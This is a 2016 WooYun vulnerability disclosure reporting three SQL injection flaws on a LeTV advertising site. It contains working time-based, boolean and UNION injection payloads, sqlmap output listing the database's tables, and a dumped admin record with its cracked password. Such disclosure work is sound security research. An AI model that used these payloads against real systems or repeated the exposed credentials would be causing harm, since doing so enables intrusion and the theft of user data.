漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0212789
漏洞标题:乐视网某站SQL注入3枚
相关厂商:乐视网
漏洞作者: 小川
提交时间:2016-05-25 18:53
修复时间:2016-07-10 11:30
公开时间:2016-07-10 11:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-05-25: 细节已通知厂商并且等待厂商处理中
2016-05-26: 厂商已经确认,细节仅向厂商公开
2016-06-05: 细节向核心白帽子及相关领域专家公开
2016-06-15: 细节向普通白帽子公开
2016-06-25: 细节向实习白帽子公开
2016-07-10: 细节向公众公开
简要描述:
乐视网某站sql注入一枚
详细说明:
http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761
几乎每个参数都有注入:
http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(user(),16)='ad@10.182.192.24' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761
请求出现延迟,用户名为:
ad@10.182.192.24
http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(database(),2)='ad' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761
数据库为ad
漏洞证明:
post请求:
http://ad.hz.letv.com/benzc-class/php/jieda_list.php
参数:
province=1
http://ad.hz.letv.com/benzc-class/php/jieda_list.php
province=1' or '1'='2
返回空
province=1' or '1'='1
返回所有数据
另一处:
post:
http://ad.hz.letv.com/benzc-class/php/jieda_data.php
参数:
jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8
参数mobile存在注入,or 1=1请求延迟,or 1=2请求不延迟
available databases [2]:
[*] ad
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -
---
web application technology: PHP 5.3.19
back-end DBMS: MySQL >= 5.0.0
Database: ad
[91 tables]
+-----------------------------+
| BAM_data |
| CAMRY_data |
| CAMRY_list |
| UserName_data |
| 'Dealer List$'_xlnm#Extract |
| Dealer List |
| a30_people |
| ad_car |
| ad_madinglin_shareNum |
| ad_page_pv_num |
| ad_record |
| ad_voteinfo |
| ad_voterecord |
| ad_wph_cmt |
| ad_wph_online_time |
| ad_wph_tel |
| add_jieqidata |
| audi_2015_list |
| audi_list |
| audi_list_bak |
| audi_list_bak1 |
| audi_list_bak2 |
| audi_list_bak3 |
| baolai_data |
| baolai_list |
| baoshan_user_data |
| baoshan_vip_card |
| baoshan_vip_week |
| benzc_data |
| benzc_list |
| changan_data |
| changan_list |
| createTab |
| diluerweimaData |
| fiesta_car |
| fiesta_list |
| fute_car |
| fute_ld |
| fute_list |
| game_kp_bianhao |
| game_kp_jpk |
| game_kp_user |
| game_yao_info |
| game_yao_jianhao |
| golf_contact |
| golf_data |
| golf_jialv_data |
| golf_jialv_list |
| golf_list |
| golf_people |
| hailan_data |
| hailan_list |
| highlander_data |
| highlander_list |
| hn_list |
| hn_record |
| infiniti_info |
| infiniti_user |
| jieda_data |
| jieda_data_bak_20150504 |
| jieda_list |
| jieda_list_yuan |
| jieda_list_yuan2 |
| jys50_yuyue |
| kadjar_data |
| kadjar_list |
| lingmu_data |
| lingmu_list |
| linmu_list_city |
| meten_phone |
| olay_record |
| olay_vote |
| op_admin_user |
| op_books |
| op_lottery_sys |
| op_signup |
| op_winner_list |
| sj_prize |
| sj_userlist |
| tp_tab |
| tp_tab_ip |
| tz18_jianId |
| tz18_user |
| vezel_contact |
| vezel_people |
| wph_yaoqinma |
| wutaigroup_cont |
| y_prize |
| y_users |
| yifu_list |
| yili |
+-----------------------------+
Table: op_admin_user
[1 entry]
+-----+----------+----------+--------------------------------------------+---------------+
| uid | username | realname | password | lastlogintime |
+-----+----------+----------+--------------------------------------------+---------------+
| 1 | admin | oppo | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536 |
+-----+----------+----------+--------------------------------------------+---------------+
管理员弱口令,打屁屁
修复方案:
过滤
版权声明:转载请注明来源 小川@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2016-05-26 11:29
厂商回复:
感谢川神对乐视安全的关注,确认漏洞存在。
另外请问川神跳槽吗?来我司发展吧!
最新状态:
暂无